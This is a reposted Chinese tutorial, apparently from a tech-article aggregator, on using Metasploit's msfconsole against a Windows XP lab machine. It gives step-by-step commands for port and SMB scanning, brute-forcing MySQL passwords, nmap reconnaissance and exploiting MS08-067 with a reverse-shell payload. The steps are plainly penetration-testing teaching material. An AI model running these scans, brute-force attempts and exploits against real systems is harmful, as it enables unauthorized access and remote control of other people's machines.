内网安全:Msfconsole攻击技术(成功拿下服务器最高权限.)

这篇具有很好参考价值的文章主要介绍了内网安全:Msfconsole攻击技术(成功拿下服务器最高权限.)。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

Msfconsole工具 概括:

Msfconsole简称(msf)是一款常用的渗透测试工具,包含了常见的漏洞利用模块和生成各种木马,方便于安全测试人员的使用.

目录:

                 Msfconsole的使用:

        第一步:进行端口扫描.

        第二步:进行服务的扫描.

        第三步:扫描3306(Mysql)端口的弱口令

        第四步:在msf模块里也可以使用nmap进行扫描.

        第五步:扫描了服务器是用Win XP,然后对服务器进行渗透测试.

         渗透测试失败的原因:


免责声明:

严禁利用本文章中所提到的虚拟机和技术进行非法攻击,否则后果自负,上传者不承担任何责任。


Msfconsole的使用:

打开Msfconsole工具:

msfconsole

msfconsole,渗透测试 领域.,# 安全测试工具领域.,# 权限提升 || 维持 领域.,系统安全,web安全,安全架构,安全


第一步:进行端口扫描.

(1)查看端口扫描的模块:

search portscan

msfconsole,渗透测试 领域.,# 安全测试工具领域.,# 权限提升 || 维持 领域.,系统安全,web安全,安全架构,安全

(2)使用端口扫描模块:

use auxiliary/scanner/portscan/tcp

msfconsole,渗透测试 领域.,# 安全测试工具领域.,# 权限提升 || 维持 领域.,系统安全,web安全,安全架构,安全

(3)查看模块信息(模块里的yes都要填):

show options

msfconsole,渗透测试 领域.,# 安全测试工具领域.,# 权限提升 || 维持 领域.,系统安全,web安全,安全架构,安全

(4)设置目标IP进行扫描:

set rhosts (目标IP地址)

msfconsole,渗透测试 领域.,# 安全测试工具领域.,# 权限提升 || 维持 领域.,系统安全,web安全,安全架构,安全

(5)设置线程为100:

set threads 100

msfconsole,渗透测试 领域.,# 安全测试工具领域.,# 权限提升 || 维持 领域.,系统安全,web安全,安全架构,安全

(6)使用(执行):run 或者 exploit

run

msfconsole,渗透测试 领域.,# 安全测试工具领域.,# 权限提升 || 维持 领域.,系统安全,web安全,安全架构,安全

(7)退出到msf :

back

msfconsole,渗透测试 领域.,# 安全测试工具领域.,# 权限提升 || 维持 领域.,系统安全,web安全,安全架构,安全


第二步:进行服务的扫描.

(1)查看smb_version服务模块:

search smb_version

msfconsole,渗透测试 领域.,# 安全测试工具领域.,# 权限提升 || 维持 领域.,系统安全,web安全,安全架构,安全

(2)使用服务模块:

use auxiliary/scanner/smb/smb_version 

msfconsole,渗透测试 领域.,# 安全测试工具领域.,# 权限提升 || 维持 领域.,系统安全,web安全,安全架构,安全

(3)查看模块信息(模块里的yes都要填):

show options

msfconsole,渗透测试 领域.,# 安全测试工具领域.,# 权限提升 || 维持 领域.,系统安全,web安全,安全架构,安全

(4)设置目标IP进行扫描:

set rhosts (目标IP地址)

msfconsole,渗透测试 领域.,# 安全测试工具领域.,# 权限提升 || 维持 领域.,系统安全,web安全,安全架构,安全

(5)设置线程为10:

set threads 10

msfconsole,渗透测试 领域.,# 安全测试工具领域.,# 权限提升 || 维持 领域.,系统安全,web安全,安全架构,安全

(6)使用(执行):run或者exploit

run

msfconsole,渗透测试 领域.,# 安全测试工具领域.,# 权限提升 || 维持 领域.,系统安全,web安全,安全架构,安全

(7)退出到msf :

back

msfconsole,渗透测试 领域.,# 安全测试工具领域.,# 权限提升 || 维持 领域.,系统安全,web安全,安全架构,安全


第三步:扫描3306(Mysql)端口的弱口令

(1)查看扫描3306(Mysql)端口的弱口令模板信息:

search mysql_login

msfconsole,渗透测试 领域.,# 安全测试工具领域.,# 权限提升 || 维持 领域.,系统安全,web安全,安全架构,安全

(2)使用扫描3306(Mysql)端口的弱口令模块:

use auxiliary/scanner/mysql/mysql_login

msfconsole,渗透测试 领域.,# 安全测试工具领域.,# 权限提升 || 维持 领域.,系统安全,web安全,安全架构,安全

(3)查看模块信息(模块里的yes都要填):

show options

msfconsole,渗透测试 领域.,# 安全测试工具领域.,# 权限提升 || 维持 领域.,系统安全,web安全,安全架构,安全

(4)设置目标IP进行扫描:

set rhosts (目标IP地址)

msfconsole,渗透测试 领域.,# 安全测试工具领域.,# 权限提升 || 维持 领域.,系统安全,web安全,安全架构,安全

(5)设置线程为10:

set threads 10

msfconsole,渗透测试 领域.,# 安全测试工具领域.,# 权限提升 || 维持 领域.,系统安全,web安全,安全架构,安全

(6)使用(执行):run或者exploit

run

msfconsole,渗透测试 领域.,# 安全测试工具领域.,# 权限提升 || 维持 领域.,系统安全,web安全,安全架构,安全

(7)退出到msf :

back

msfconsole,渗透测试 领域.,# 安全测试工具领域.,# 权限提升 || 维持 领域.,系统安全,web安全,安全架构,安全


第四步:在msf模块里也可以使用nmap进行扫描.

(1)主机发现:

nmap -sn 地址/24

msfconsole,渗透测试 领域.,# 安全测试工具领域.,# 权限提升 || 维持 领域.,系统安全,web安全,安全架构,安全

(2)端口扫描:

nmap -sS 地址

msfconsole,渗透测试 领域.,# 安全测试工具领域.,# 权限提升 || 维持 领域.,系统安全,web安全,安全架构,安全

(3)系统扫描:

nmap -O 地址

msfconsole,渗透测试 领域.,# 安全测试工具领域.,# 权限提升 || 维持 领域.,系统安全,web安全,安全架构,安全

(4)版本扫描:

nmap -sV 地址

msfconsole,渗透测试 领域.,# 安全测试工具领域.,# 权限提升 || 维持 领域.,系统安全,web安全,安全架构,安全

(5)综合扫描:

nmap -A 地址

msfconsole,渗透测试 领域.,# 安全测试工具领域.,# 权限提升 || 维持 领域.,系统安全,web安全,安全架构,安全


第五步:扫描了服务器是用Win XP,然后对服务器进行渗透测试.

(1)启动 postgresql 数据库:

systemctl start postgresql.service

msfconsole,渗透测试 领域.,# 安全测试工具领域.,# 权限提升 || 维持 领域.,系统安全,web安全,安全架构,安全


(2)设置为开机自启:

systemctl enable postgresql

msfconsole,渗透测试 领域.,# 安全测试工具领域.,# 权限提升 || 维持 领域.,系统安全,web安全,安全架构,安全


(3)启动 Metasploit

msfconsole

msfconsole,渗透测试 领域.,# 安全测试工具领域.,# 权限提升 || 维持 领域.,系统安全,web安全,安全架构,安全


(4)搜索Win XP漏洞对应的模块.

search ms08_067

msfconsole,渗透测试 领域.,# 安全测试工具领域.,# 权限提升 || 维持 领域.,系统安全,web安全,安全架构,安全


(5)使用Win XP漏洞扫描模块.

use exploit/windows/smb/ms08_067_netapi

msfconsole,渗透测试 领域.,# 安全测试工具领域.,# 权限提升 || 维持 领域.,系统安全,web安全,安全架构,安全


(6)设置攻击载荷

set payload generic/shell_reverse_tcp

msfconsole,渗透测试 领域.,# 安全测试工具领域.,# 权限提升 || 维持 领域.,系统安全,web安全,安全架构,安全


(7)查看模块信息(模块里的yes都要填).

show options

msfconsole,渗透测试 领域.,# 安全测试工具领域.,# 权限提升 || 维持 领域.,系统安全,web安全,安全架构,安全


(8)查看渗透攻击模块的攻击平台,找到操作系统平台版本

show targets 

msfconsole,渗透测试 领域.,# 安全测试工具领域.,# 权限提升 || 维持 领域.,系统安全,web安全,安全架构,安全


(9)设置操作系统(target).

set target 34

msfconsole,渗透测试 领域.,# 安全测试工具领域.,# 权限提升 || 维持 领域.,系统安全,web安全,安全架构,安全


(10)设置目标IP.

set rhosts (目标IP地址)

msfconsole,渗透测试 领域.,# 安全测试工具领域.,# 权限提升 || 维持 领域.,系统安全,web安全,安全架构,安全


(11)设置本地IP

set LHOST 本地IP

msfconsole,渗透测试 领域.,# 安全测试工具领域.,# 权限提升 || 维持 领域.,系统安全,web安全,安全架构,安全


(12)设置端口:

set LPORT 4444

msfconsole,渗透测试 领域.,# 安全测试工具领域.,# 权限提升 || 维持 领域.,系统安全,web安全,安全架构,安全


(13)使用(执行):run或者exploit

msfconsole,渗透测试 领域.,# 安全测试工具领域.,# 权限提升 || 维持 领域.,系统安全,web安全,安全架构,安全


(14)渗透测试成功. 


渗透测试失败的原因:

(1)靶机开启了防火墙.

(2)两台主机不能互联.(用 ping IP地址)

     


参考链接:使用MSF 利用 ms08_067 对 XP 进行渗透_丰梓林的博客-CSDN博客文章来源地址https://www.toymoban.com/news/detail-601667.html

到了这里,关于内网安全:Msfconsole攻击技术(成功拿下服务器最高权限.)的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 内网安全 信息收集(收集内网计算机的所有信息 进行攻击.)

    在   渗透测试人员 进入一个内 网后,面对的是一片 “ 未知的区域 ”,所以 渗透测试人员首先会对当前所 处的网络环境进行判断,通常的判断分为三种. (1) 我是谁? —— 对计算机的角色进行判断. (2)我在哪? —— 对目前机器所处位置区域的判断。 (3)这是哪?

    2024年02月02日
    浏览(46)
  • 内网安全--AS-REP Roasting攻击

    AS-REP Roasting是一种对用户账号进行离线爆破的攻击方式。但是该攻击方式利用比较局限,因为其需要用户账户设置“不要求Kerberos预身份验证”选项,而该选项是默认没有勾选上的。Kerberos预身份验证发送在Kerberos身份验证的第一阶段(AS_REQAS-REP),它的主要作用是防止密码离线

    2024年04月14日
    浏览(29)
  • 内网安全:横向传递攻击( RDP || Cobalt Strike )

    横向移动就是在拿下对方一台主机后,以拿下的那台主机作为跳板,对内网的其他主机再进行后面渗透,利用既有的资源尝试获取更多的凭据、更高的权限,一步一步拿下更多的主机,进而达到控制整个内网、获取到最高权限、发动高级持续性威胁攻击的目的.( 传递攻击主

    2024年02月10日
    浏览(41)
  • 内网安全:横向传递攻击(SMB || WMI 明文或 hash 传递)

    横向移动就是在拿下对方一台主机后,以拿下的那台主机作为跳板,对内网的其他主机再进行后面渗透,利用既有的资源尝试获取更多的凭据、更高的权限,一步一步拿下更多的主机,进而达到控制整个内网、获取到最高权限、发动高级持续性威胁攻击的目的.( 传递攻击主

    2024年02月08日
    浏览(40)
  • 8、内网安全-横向移动&RDP&Kerberos攻击&SPN扫描&WinRM&WinRS

    用途:个人学习笔记,有所借鉴,欢迎指正 目录 一、域横向移动-RDP-明文NTLM 1.探针服务: 2.探针连接: 3.连接执行: 二、域横向移动-WinRMWinRS-明文NTLM 1.探针可用: 2.连接执行: 3.上线 CSMSF: 4.CS 内置横向移动 三、域横向移动-SpnKerberos-请求破解重写 Kerberoasting攻击的利用:

    2024年02月19日
    浏览(39)
  • 软件测试岗,4 轮面试成功拿下字节 Offer..........

    一共经历了四轮面试:技术4面+HR面。 特整理出所涉及的全部知识点,并复盘了完整面试题及答案,分享给大家,希望能够帮到一些计划面试字节的朋友。 怎么编写案例? 软件测试的两种方法 测试结束的标准是什么? 软件的生命周期 什么是软件的生命周期? 软件测试按过程分

    2024年02月03日
    浏览(48)
  • 网络攻防技术——缓冲区溢出攻击(基于服务器)

          缓冲区溢出 被定义为程序试图将数据写入缓冲区边界之外的情况。恶意用户可以利用此漏洞更改程序的流控制,从而导致恶意代码的执行。本实验的目的是让学生对这种类型的漏洞有实际的了解,并学习如何利用攻击中的漏洞。      在这个实验中,学生将得到四个不

    2024年02月02日
    浏览(65)
  • 服务器安全性漏洞和常见攻击方式解析

    服务器安全性是当今互联网信息安全的重要组成部分。在网络安全领域中,常见的威胁之-就是服务器安全性漏洞。本文将深入探讨服务器安全性漏洞的本质,并分析常见的攻击方式并提供一些建议以加强服务器的安全性。 一、服务器安全性漏洞的本质 服务器安全性漏洞指的

    2024年01月17日
    浏览(46)
  • 内网安全:隧道技术详解

    目录 隧道技术 反向连接技术 反向连接实验所用网络拓扑图及说明 网络说明 防火墙限制说明 实验前提说明 实战一:CS反向连接上线 - 拿下Win2008 一. 使用转发代理上线创建监听器 二. 上传后门执行上线 隧道技术 - SMB协议 SMB协议介绍 实战二:SMB协议搭建隧道 正向连接 - 拿下

    2024年02月08日
    浏览(38)
  • 内网安全:初探隧道技术

    目录 防火墙必备知识 域控-防火墙组策略对象同步 域控 - 防火墙组策略不出网上线 MSF上线 CS - ICMP上线 注意:隧道技术是后渗透手段,是在已经取得权限后的手段 域控-组策略同步 学习防火墙的目标是知道了解防火墙的一些常见配置对内网渗透的影响,并不需要像运维一样全

    2024年02月07日
    浏览(41)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包